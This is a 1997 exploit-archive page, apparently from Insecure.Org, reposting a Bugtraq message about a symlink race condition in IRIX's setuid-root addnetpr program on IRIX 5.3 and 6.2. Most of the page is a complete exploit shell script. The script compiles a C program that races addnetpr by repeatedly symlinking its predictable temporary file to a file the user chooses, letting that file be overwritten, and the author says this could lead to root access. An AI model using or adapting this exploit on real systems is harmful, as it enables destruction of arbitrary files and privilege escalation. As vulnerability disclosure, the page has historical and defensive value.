IRIX addnetpr race condition

Summary
Description:IRIX's addnetpr program has a symlink race condition that allows the clobbering of arbitrary files.
Author:Jaechul Choe <poison@COSMOS.KAIST.AC.KR>
Compromise:cause addnetpr to write to arbitrary files. It is unclear whether it appends or overwrites to already existing files. Could probably lead to root access.
Vulnerable Systems:IRIX 5.3, 6.2
Date:9 May 1997
Details

Date: Fri, 9 May 1997 06:33:46 +0900
From: Jaechul Choe <poison@COSMOS.KAIST.AC.KR>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Irix: misc


Wow, your works are so fertile and wonderful.
Let me add some stuffs

[. . .]


There was the same race condition in the program, /usr/lib/addnetpr, 
another
suid root program for print.
Here is the exploit script for it.
But though I tried, it was hard to find the way to get root with it.
It can fill the target with the two argument of addnetpr, but with some
messages unable to control.
And it will prompt the window asking root passwd to non-privilegedd(not 
root,
but irix-specific privileged) users.
Privileged users bypass the window and can run the race.

Tested both IRIX 5.3 and 6.2

---------------)<-----------cut expnetpr.sh 
---------------)<----------------

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
        echo "Usage: $PROG <target>"
        exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
void main(int argc, char *argv[])
{
        char *template = "/var/tmp/printersXXXXXX";
        char *target;
        int pid;

        target = (char *)mktemp(template);

        if ((pid = fork()) > 0) {
                sleep(3);
                umask(0);
                execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 
0);
        }
        else
                while(1) {
                        symlink(argv[1], target);
                        unlink(target);
                }

}
_CREDIT_TO_ZOMO_
/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
        echo "Couldn't compile expnetpr.c, lame! \nMake sure that C 
compiler has
 been installed from the IDO"
        exit 1
fi

while(`true`)
do
        ./expnetpr $1&
        PID=$!
        sleep 15
        ls -al $1
        killall expnetpr
        killall addnetpr
done

--------------------)<------------ cut 
---------------)<-------------------


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault